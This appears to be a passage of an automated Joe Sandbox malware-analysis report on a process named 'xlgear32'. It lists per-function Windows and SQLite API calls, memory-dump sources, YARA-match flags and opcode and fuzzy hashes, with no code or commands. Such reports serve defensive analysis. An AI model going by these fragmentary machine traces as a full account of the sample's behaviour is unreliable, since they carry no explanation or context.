                                                                          • String ID:
                                                                          • API String ID: 3700342317-0
                                                                          • Opcode ID: c061340fc1ffd9397dc8457eb5b4e04ab4ebd4115446526a5c71cf2e6dfca7d9
                                                                          • Instruction ID: d05b91f3ad246e095316268f824886f18d2806347064d09a8ffea107906a9197
                                                                          • Opcode Fuzzy Hash: c061340fc1ffd9397dc8457eb5b4e04ab4ebd4115446526a5c71cf2e6dfca7d9
                                                                          • Instruction Fuzzy Hash: 69211BB1904209AFDF04DFA4D540AEEBBF9FF49310F14411AE915A7340E771AD01CBA5
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 50d038042ea2c4935370e3ca81c390e64a2fbfca27dbf92160fe7fdd3c08c324
                                                                          • Instruction ID: 44b26506712acb51df5a8eb610016e9b0d5cb39a993df57c19a9bdeef6fd7d86
                                                                          • Opcode Fuzzy Hash: 50d038042ea2c4935370e3ca81c390e64a2fbfca27dbf92160fe7fdd3c08c324
                                                                          • Instruction Fuzzy Hash: 32116AF250CA14DBD311BF69D88577AFBE8EF48341F16091EDAD097640D67118848B97
                                                                          APIs
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02D933CC
                                                                            • Part of subcall function 02D932AB: __EH_prolog.LIBCMT ref: 02D932B0
                                                                            • Part of subcall function 02D932AB: RtlEnterCriticalSection.NTDLL(?), ref: 02D932C3
                                                                            • Part of subcall function 02D932AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D932EF
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                          • String ID:
                                                                          • API String ID: 1518410164-0
                                                                          • Opcode ID: 2e2ac5098e0543198fe9814890d0ad4aadad4a8d1777617b21d4f38baeef779d
                                                                          • Instruction ID: cacbc79bdaa1ad9cf0f84b6d23289a7f0d0839ed8401fec1becc800c5abba0cd
                                                                          • Opcode Fuzzy Hash: 2e2ac5098e0543198fe9814890d0ad4aadad4a8d1777617b21d4f38baeef779d
                                                                          • Instruction Fuzzy Hash: 7D012D71654606AFDB049F59D885B55BBA9FF49320F10835AF868873C0EB70ED21CBA4
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 970e9f69bec3359f119859299074b3b06d462244b0d05b5a1fd4d985648813c7
                                                                          • Instruction ID: 2d6e82c73f1ccf03afcdb7d036e401a1aefd2f3abac8b17d9f136c69b772a6c3
                                                                          • Opcode Fuzzy Hash: 970e9f69bec3359f119859299074b3b06d462244b0d05b5a1fd4d985648813c7
                                                                          • Instruction Fuzzy Hash: 240113F244C618EFE7117F09EC857BABBE4EF44761F02081DE6C046600EA315844CB9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8b752a95ec8001cdb7d634afe3e3089ae3aa72283ad494e1486f240dac33569
                                                                          • Instruction ID: 4c4bced84a15559e84380ca9cb6a06561af7595c41b9be24f35168943475007a
                                                                          • Opcode Fuzzy Hash: c8b752a95ec8001cdb7d634afe3e3089ae3aa72283ad494e1486f240dac33569
                                                                          • Instruction Fuzzy Hash: 07F0E921E4C145E9E61725F05F0C5692F209D67380339557BD893B16D0E9BE884FA29F
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9E556
                                                                            • Part of subcall function 02D926DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D92706
                                                                            • Part of subcall function 02D926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D9272B
                                                                            • Part of subcall function 02D926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DB5B53), ref: 02D92738
                                                                            • Part of subcall function 02D926DB: SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D92778
                                                                            • Part of subcall function 02D926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D927D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID:
                                                                          • API String ID: 4293676635-0
                                                                          • Opcode ID: 4e238c980787d8b344e801aff4792050718008315ae0b8a05a433932b8ec601e
                                                                          • Instruction ID: 23dbc3dd8898ef5f0c992005aa643adc766a84ea9624279eeeb78368702bf8b4
                                                                          • Opcode Fuzzy Hash: 4e238c980787d8b344e801aff4792050718008315ae0b8a05a433932b8ec601e
                                                                          • Instruction Fuzzy Hash: 9C01DCB4900B04DFC719CF1AC64498AFBF5EF88700B15C6AE944A8B721E770EA40CFA0
                                                                          APIs
                                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 02E2C6F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPathSpecial
                                                                          • String ID:
                                                                          • API String ID: 994120019-0
                                                                          • Opcode ID: 7f038540116fa8564e045d42b1eaae522119dbf2b9efa41a8dffae74188cd979
                                                                          • Instruction ID: 44582a98a7c0a411b5983796e52fcbc40f8476900d9424943ca3a519b8352888
                                                                          • Opcode Fuzzy Hash: 7f038540116fa8564e045d42b1eaae522119dbf2b9efa41a8dffae74188cd979
                                                                          • Instruction Fuzzy Hash: CDE0E5B248C7188FE3013E58FC957F9B7E4DB04260F05583DC7C282300E67198408AC7
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002DCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DCA000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2dca000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: a13e047478bd8a6a42dc18cd0547f10866faa3ed0a4c43cb17f54e713b12e739
                                                                          • Instruction ID: e6ecf3aac4c6162e2361db1869ec8518039325d410faadb1dfd285144a9866fc
                                                                          • Opcode Fuzzy Hash: a13e047478bd8a6a42dc18cd0547f10866faa3ed0a4c43cb17f54e713b12e739
                                                                          • Instruction Fuzzy Hash: A8E0B6B148C6089BEB2A7A09DC8177DB3E4AF14740F46482C9BD243390F9356860CADB
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 02D9E335
                                                                            • Part of subcall function 02DA3B4C: _malloc.LIBCMT ref: 02DA3B64
                                                                            • Part of subcall function 02D9E551: __EH_prolog.LIBCMT ref: 02D9E556
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_malloc
                                                                          • String ID:
                                                                          • API String ID: 4254904621-0
                                                                          • Opcode ID: ce4750045d6a268a38653e261c07822e3d05f0ff43c8a6aef5239d92cdf6007f
                                                                          • Instruction ID: 18039e08c142749f1f6a948e6bf6e2ad8d2af5a486ba7b60d8d359c84aa20f25
                                                                          • Opcode Fuzzy Hash: ce4750045d6a268a38653e261c07822e3d05f0ff43c8a6aef5239d92cdf6007f
                                                                          • Instruction Fuzzy Hash: 18E0CD71A11105ABCF4DDF98D81076D77A6EF04700F00416EB80ED2340DF70DD008A54
                                                                          APIs
                                                                            • Part of subcall function 02DA5C5A: __getptd_noexit.LIBCMT ref: 02DA5C5B
                                                                            • Part of subcall function 02DA5C5A: __amsg_exit.LIBCMT ref: 02DA5C68
                                                                            • Part of subcall function 02DA3493: __getptd_noexit.LIBCMT ref: 02DA3497
                                                                            • Part of subcall function 02DA3493: __freeptd.LIBCMT ref: 02DA34B1
                                                                            • Part of subcall function 02DA3493: RtlExitUserThread.NTDLL(?,00000000,?,02DA3473,00000000), ref: 02DA34BA
                                                                          • __XcptFilter.LIBCMT ref: 02DA347F
                                                                            • Part of subcall function 02DA8D94: __getptd_noexit.LIBCMT ref: 02DA8D98
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                          • String ID:
                                                                          • API String ID: 1405322794-0
                                                                          • Opcode ID: 2a044c1f968add674bba766a00d7facb4f50a519bf2923733d3bc24f5d0e458e
                                                                          • Instruction ID: 5eaaf033721b22cde4119292bfec44b2d5e98e039382bcc4a946e519219e3410
                                                                          • Opcode Fuzzy Hash: 2a044c1f968add674bba766a00d7facb4f50a519bf2923733d3bc24f5d0e458e
                                                                          • Instruction Fuzzy Hash: 38E0ECB1D446019FEB08BBA0E859F2D7766EF04701F200488E502AB361CA74AD40AE30
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNEL32(80000002), ref: 00402A31
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: aed91c5e2db4a472a327caa05b34cb2312bccbeb60dbe7524a7475a69a87eb61
                                                                          • Instruction ID: 391140d39f6363fe9284a6718c49bea0c34dcd7bfdddc889766891a5dfeac042
                                                                          • Opcode Fuzzy Hash: aed91c5e2db4a472a327caa05b34cb2312bccbeb60dbe7524a7475a69a87eb61
                                                                          • Instruction Fuzzy Hash: 07E01271908115DAD7458BE0D944AFFBBB86B25304F61047BE843F61C0D77C964EA72B
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: c51f7133d245e36b5ef68ca67cde452df16776778f160017d81fa19080902b6f
                                                                          • Instruction ID: 34a393598c5a1eb56d4e5581fcee354bef605b3b3ba2ff18e136e76798c667a3
                                                                          • Opcode Fuzzy Hash: c51f7133d245e36b5ef68ca67cde452df16776778f160017d81fa19080902b6f
                                                                          • Instruction Fuzzy Hash: DAB0123128D011E7C0011A405E09EAB502C4A0A38032040367102700C145FC0506967E
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 6387ede01eaef290c7160cd8943e2673a27ec9d3c9851565785a920c4f73f209
                                                                          • Instruction ID: 6c57ee3b2b08538006332e2037b2a6fcaff609d84994734356c29db49792d02c
                                                                          • Opcode Fuzzy Hash: 6387ede01eaef290c7160cd8943e2673a27ec9d3c9851565785a920c4f73f209
                                                                          • Instruction Fuzzy Hash: F4B09235C49401E6C64227C04A48D697A306A193007208233E207300D086F8A80AB71F
                                                                          APIs
                                                                          • LoadLibraryExA.KERNEL32(?,00000000), ref: 0040D3A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 398fab2d751ecfb93693a12abff0b36310409ed9291769b6af3f87ac72a9328e
                                                                          • Instruction ID: 28214bcbb3204342a1b1f4a26b6896509a4363b8035d439ea7a8080bfcacd4a6
                                                                          • Opcode Fuzzy Hash: 398fab2d751ecfb93693a12abff0b36310409ed9291769b6af3f87ac72a9328e
                                                                          • Instruction Fuzzy Hash: EFC09B34500215DFDB408F64DD44B593BF4BF04740F100535E405E5190D77195019B45
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: 7ec1c664a2ff187a57ef4d7fc890f787bd0a258d4d21fd0839bc39abadf81a67
                                                                          • Instruction ID: bc27b3751eb719869b73d4606e9b78e87f1238a5196a18b0f5264eb26db53955
                                                                          • Opcode Fuzzy Hash: 7ec1c664a2ff187a57ef4d7fc890f787bd0a258d4d21fd0839bc39abadf81a67
                                                                          • Instruction Fuzzy Hash: E5B012103042029DC6210D700B0C223104015047803150C3F5C43F11D0D67C8006201D
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID:
                                                                          • API String ID: 1304948518-0
                                                                          • Opcode ID: 4697c56c58a4b9bfec89be4aa9e287f240d21a00262414fb0488fa3d69077895
                                                                          • Instruction ID: 7a955f6cc2f1f8e80166588b3dfc88a9658cf8b8bf31edb41406b191a7f20c8d
                                                                          • Opcode Fuzzy Hash: 4697c56c58a4b9bfec89be4aa9e287f240d21a00262414fb0488fa3d69077895
                                                                          • Instruction Fuzzy Hash: 1D9002303045419AD2000E215F5C615377855446C535544796447F0094DA7490496519
                                                                          APIs
                                                                            • Part of subcall function 02DA1610: OpenEventA.KERNEL32(00100002,00000000,00000000,7CC1903D), ref: 02DA16B0
                                                                            • Part of subcall function 02DA1610: CloseHandle.KERNEL32(00000000), ref: 02DA16C5
                                                                            • Part of subcall function 02DA1610: ResetEvent.KERNEL32(00000000,7CC1903D), ref: 02DA16CF
                                                                            • Part of subcall function 02DA1610: CloseHandle.KERNEL32(00000000,7CC1903D), ref: 02DA1704
                                                                          • TlsSetValue.KERNEL32(00000029,?), ref: 02DA21AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937183338.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D91000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_2d91000_xlgear32.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                          • String ID:
                                                                          • API String ID: 1556185888-0
                                                                          • Opcode ID: ccc1e1ed6afafa902bc84bf29fcc8a51a368cc22503c46dae4c2929f894cd9cc
                                                                          • Instruction ID: 2734cd0ab09c7f41785e9f005c6f124ac537ebf6272796956e229896d4b9d692
                                                                          • Opcode Fuzzy Hash: ccc1e1ed6afafa902bc84bf29fcc8a51a368cc22503c46dae4c2929f894cd9cc
                                                                          • Instruction Fuzzy Hash: 48018F76A44204EBD700CF69DC45F9ABBA8EB05671F204B6AF825D3780D731AD148AA0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 1586166983-0
                                                                          • Opcode ID: 1d628e66bcc2136491b692bc82bf371a75d1b94ed9b58e3e12234206875eb839
                                                                          • Instruction ID: 69e9af10a6a7a0042301cde8c881ff7366d1b1b249570328560fe19bc8a80875
                                                                          • Opcode Fuzzy Hash: 1d628e66bcc2136491b692bc82bf371a75d1b94ed9b58e3e12234206875eb839
                                                                          • Instruction Fuzzy Hash: D1D01731A0411ADBE7089EB1AE945BD3674AA08B92325043FE403B51D1DBBC6A0AA51E
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 1d73d17cf86509b83ffb441e6e13f17a0f9e4f0bc6d37178257e2431527e7a42
                                                                          • Instruction ID: 0a3c44f9156613cf0c39df5419219f0d6b6772f92975047c21adf9bf8be382d1
                                                                          • Opcode Fuzzy Hash: 1d73d17cf86509b83ffb441e6e13f17a0f9e4f0bc6d37178257e2431527e7a42
                                                                          • Instruction Fuzzy Hash: 8DC08C30908B00EBEB042BE4DE08C283734AB08300B210126F14AE20D0CB38AA09BA9F
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 5c9b3484a0c039218701f8b7e1abcbf0824f7a77f3ef670c2a72dadcf6225890
                                                                          • Instruction ID: ed451d5caee5ef4bbc53c0c8780dddc3fc23dc65a6d1a240ab572ba9267a686c
                                                                          • Opcode Fuzzy Hash: 5c9b3484a0c039218701f8b7e1abcbf0824f7a77f3ef670c2a72dadcf6225890
                                                                          • Instruction Fuzzy Hash: 01B01235800111DFC7028F608B0805CBFB0B70C300711007AE541B2250C7B41528DBC4
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2935775203.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000004.00000002.2935775203.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_400000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 070fe0ec7119d6e58c8b8ef7b82ced6643895955a2a818063bb7b844bcb2afb2
                                                                          • Instruction ID: 0f329c160bda7ad3ba111d186c9c71302f7af56df08d4ba4299fae2684aac1c0
                                                                          • Opcode Fuzzy Hash: 070fe0ec7119d6e58c8b8ef7b82ced6643895955a2a818063bb7b844bcb2afb2
                                                                          • Instruction Fuzzy Hash: 48900231544900B6D14006606B0DF1435216348701F5101266742680D049B50045560E
                                                                          APIs
                                                                          • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                            • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                            • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                            • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                          • sqlite3_step.SQLITE3 ref: 6096755A
                                                                          • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                          • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                          • sqlite3_step.SQLITE3 ref: 609679C3
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                          • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                          • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                          • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                          • sqlite3_step.SQLITE3 ref: 60967B94
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                          • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                          • memcmp.MSVCRT ref: 60967D4C
                                                                          • sqlite3_free.SQLITE3 ref: 60967D69
                                                                          • sqlite3_free.SQLITE3 ref: 60967D74
                                                                          • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                          • sqlite3_free.SQLITE3 ref: 60968002
                                                                            • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                            • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                            • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                            • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                            • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                          • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                            • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                          • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                          • sqlite3_reset.SQLITE3 ref: 60968035
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                            • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                          • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                          • sqlite3_step.SQLITE3 ref: 609680D1
                                                                          • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                          • sqlite3_reset.SQLITE3 ref: 60968104
                                                                          • sqlite3_step.SQLITE3 ref: 60968139
                                                                          • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                          • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                            • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                            • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                          • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                            • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                          • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                            • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                          • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                            • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                          • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                          • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                          • sqlite3_step.SQLITE3 ref: 6096764C
                                                                          • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                          • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                          • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                            • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                          • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                          • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                          • sqlite3_step.SQLITE3 ref: 609690E6
                                                                          • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                          • sqlite3_free.SQLITE3 ref: 60969102
                                                                          • sqlite3_free.SQLITE3 ref: 6096910D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmp
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID: $d
                                                                          • API String ID: 2451604321-2084297493
                                                                          • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                          • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                          • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                          • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                          APIs
